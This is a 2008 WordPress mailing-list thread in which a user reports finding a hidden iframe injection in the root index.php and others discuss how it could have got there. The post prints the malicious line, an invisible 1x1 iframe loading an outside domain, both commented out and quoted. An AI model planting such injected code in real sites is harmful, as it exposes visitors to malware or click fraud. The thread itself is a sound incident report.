[wp-hackers] XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 18:39:49 GMT 2008 

Yes that's exactly what i am saying. Here is my index.php:

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

// echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>



I've commented the line so i can keep it for future investigations.

Our password have NOT been compromised as the only logins are from my
host and my friend's host. It could be an older version of a plugin
tough.

However, i had to report this as maybe someone will encounter the same
problem or so.

Thanks.

On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
<wp-hackers at striderweb.com> wrote:
> Well, wait.  he said:  "i found [it in] my blog's index.php (not theme's
> index.php)"
>
> Does this mean it shows up in the final rendered page, but not in the
> theme's file?  In that case, it's being added dynamically.  The link is not
> written in the theme.
>
> Just trying to clarify.  I'm no security guru... (IANASG)
>
> Stephen
>
> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>
>> If the file is writable for the webserver and file access is enabled on
>> the webserver: yes.
>
>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>
>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>
>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>
>>>> For some reason i found my blog's index.php (not theme's index.php)
>>>> with the following piece of code right before the ?>
>>>>
>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>
>>>> I tried looking at the logs. No luck. The file's permisions look like
>>>> this:
>>>>
>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>>> /home/madalin/www/index.php
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

More information about the wp-hackers mailing list